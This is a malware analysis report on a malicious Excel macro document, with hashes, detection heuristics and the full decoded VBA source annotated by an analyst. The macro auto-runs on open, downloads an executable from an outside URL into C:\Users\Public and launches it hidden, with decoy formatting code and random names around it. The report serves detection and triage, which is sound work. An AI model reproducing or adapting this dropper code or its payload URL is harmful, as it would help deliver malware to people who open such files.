Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 54bd5cb7ca7aac2b…

MALICIOUS

Office (OOXML)

Size: 185.7 KB — First seen: 2020-11-23
MD5: 1e1c9f5464e9b273b6d1037645a381df SHA-1: 64a44f02359dbe17f9057c08c7ee28a27444b94c SHA-256: 54bd5cb7ca7aac2b3e3d094eb7ac8adf51d70f4d507df8f0bf40c5f65b8e0228
Risk score: 150

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    vbgqpycmoyrljceecstsurdyammjtwauuvpsufgcxtckoajtlzzfrrpdyipdmttryxronmkxlqvapskadtxtwuccfltmpcpeak = Shell(mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno, vbNormalNoFocus)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sparepartiran.com/js/d1/OrV86zxFWHW1j0f.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3414 bytes
SHA-256: d8223cf87f17b79013cc62f5c33deb72ce22f7feb503dfdbf46023f7d9e2136b
Preview script
First 1,000 lines of the extracted script
' Module header emitted by the VBA host for the "ThisWorkbook" document module.
' These Attribute lines are module metadata (name, base class GUID, instancing
' flags), not executable statements; the code of interest starts below them.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 API import: binds a random-looking VBA name to urlmon!URLDownloadToFileA,
' which fetches a URL and writes it to a local file. The random function name hides
' the API from naive symbol scans; the Alias string is what the OLE_VBA_DOWNLOAD
' heuristic above matched, and it is the reliable detection point for this pattern.
Private Declare PtrSafe Function txcmhxcwteuwrpsuryomsjnlgtlvrvwfjaatqp Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
' Auto-run entry point: Excel fires Workbook_Open as soon as the workbook is opened
' with macros enabled, so execution needs no user action beyond enabling content.
' Most of the body is conditional-formatting calls that look like recorded
' formatting code — presumably decoy activity; the single bare procedure call in
' the middle hands off to the routine that performs the download and execution.
Private Sub Workbook_Open()
Range("A1:G15").Select
Selection.FormatConditions.AddColorScale ColorScaleType:= 3
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
Selection.FormatConditions(1).ColorScaleCriteria(1).Type = _
xlConditionValueLowestValue
' Transfers control to the payload-stage procedure (defined below in this module).
iaxyyeefkubvwbzgqjfltvqebykkk
With Selection.FormatConditions(1).ColorScaleCriteria(1).FormatColor
.Color = 8109667
.TintAndShade = 0
End With
End Sub
' Payload stage, called from Workbook_Open. Between formatting and cell-write
' statements that appear to serve only as noise, it does two things in order:
'   1. downloads the URL assigned below into C:\Users\Public\ via the aliased
'      URLDownloadToFileA import;
'   2. launches that file with Shell().
' Detection/triage pointers: the URL and the C:\Users\Public\*.exe drop path are
' the concrete IoCs; the Declare alias and the Shell() call are the heuristic hits.
Public Sub iaxyyeefkubvwbzgqjfltvqebykkk()
Selection.FormatConditions(1).ColorScaleCriteria(2).Type = _
xlConditionValuePercentile
Selection.FormatConditions(1).ColorScaleCriteria(2).Value = 50
With Selection.FormatConditions(1).ColorScaleCriteria(2).FormatColor
.Color = 8711167
.TintAndShade = 0
End With
Selection.FormatConditions(1).ColorScaleCriteria(3).Type = _
xlConditionValueHighestValue
With Selection.FormatConditions(1).ColorScaleCriteria(3).FormatColor
.Color = 7039480
.TintAndShade = 0
End With
' Remote payload location (the same URL reported under EMBEDDED_URL above).
jzmfdleolcvhcjmwwppnzfxousaimemf = "http://sparepartiran.com/js/d1/OrV86zxFWHW1j0f.exe"
ActiveCell.FormulaR1C1 = "12"
Range("F2").Select
' URLDownloadToFileA(pCaller=0, szURL, szFileName, 0, 0): fetches the payload into
' C:\Users\Public\, a location a standard (non-admin) user can write to. The path
' is split into two string literals, presumably to break up the full-path string.
txcmhxcwteuwrpsuryomsjnlgtlvrvwfjaatqp 0,jzmfdleolcvhcjmwwppnzfxousaimemf,"C:\Users\Public\" +"wbcjjntbhogizoudqwasmcfkurscdtbozmcnjeajwpwvk.exe",0,0
ActiveCell.FormulaR1C1 = "12"
Range("E3").Select
' Receives the Shell() return value; declared as Variant, never read afterwards.
Dim vbgqpycmoyrljceecstsurdyammjtwauuvpsufgcxtckoajtlzzfrrpdyipdmttryxronmkxlqvapskadtxtwuccfltmpcpeak As Variant
ActiveCell.FormulaR1C1 = "15"
Range("C4").Select
Dim mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno As String
ActiveCell.FormulaR1C1 = "14"
Range("C5").Select
' Rebuilds the drop path from the same two string pieces used in the download call.
mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno = "C:\Users\Public\"+"wbcjjntbhogizoudqwasmcfkurscdtbozmcnjeajwpwvk.exe"
ActiveCell.FormulaR1C1 = "56"
Range("A6").Select
ActiveCell.FormulaR1C1 = "45"
Range("A3").Select
ActiveCell.FormulaR1C1 = "15"
' Executes the downloaded file; vbNormalNoFocus starts it without taking focus from
' Excel, so the user sees no new foreground window. This is the OLE_VBA_SHELL match.
vbgqpycmoyrljceecstsurdyammjtwauuvpsufgcxtckoajtlzzfrrpdyipdmttryxronmkxlqvapskadtxtwuccfltmpcpeak = Shell(mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno, vbNormalNoFocus)
' Remaining cell writes have no effect on the payload; they pad the procedure.
Range("F5").Select
ActiveCell.FormulaR1C1 = "21"
Range("D7").Select
ActiveCell.FormulaR1C1 = "21"
Range("D10").Select
ActiveCell.FormulaR1C1 = "12"
Range("B11").Select
ActiveCell.FormulaR1C1 = "155"
Range("B10").Select
ActiveCell.FormulaR1C1 = "64485"
 Range("B9").Select
ActiveCell.FormulaR1C1 = "1"
Range("B3").Select
ActiveCell.FormulaR1C1 = "15546"
Range("D2").Select
ActiveCell.FormulaR1C1 = "15"
Range("D3").Select
End Sub
' Empty close handler: does nothing. Presumably left over from macro recording or
' added as filler; it contributes no behaviour and does not cancel closing.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
End Sub

' Header of a second, randomly named document module. Only its Attribute metadata
' survived extraction here — no procedures follow, so it appears to carry no code.
' The base GUID differs from ThisWorkbook's (…20820 vs …20819), so this is likely a
' worksheet module — TODO confirm against the OOXML part list.
Attribute VB_Name = "drehxwcqpprucokoegxiegpbxnjioha"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 6144 bytes
SHA-256: b80d43d98caf8468268bccb6ee0b570ae52942520dbcc997a71efea0a35f63d0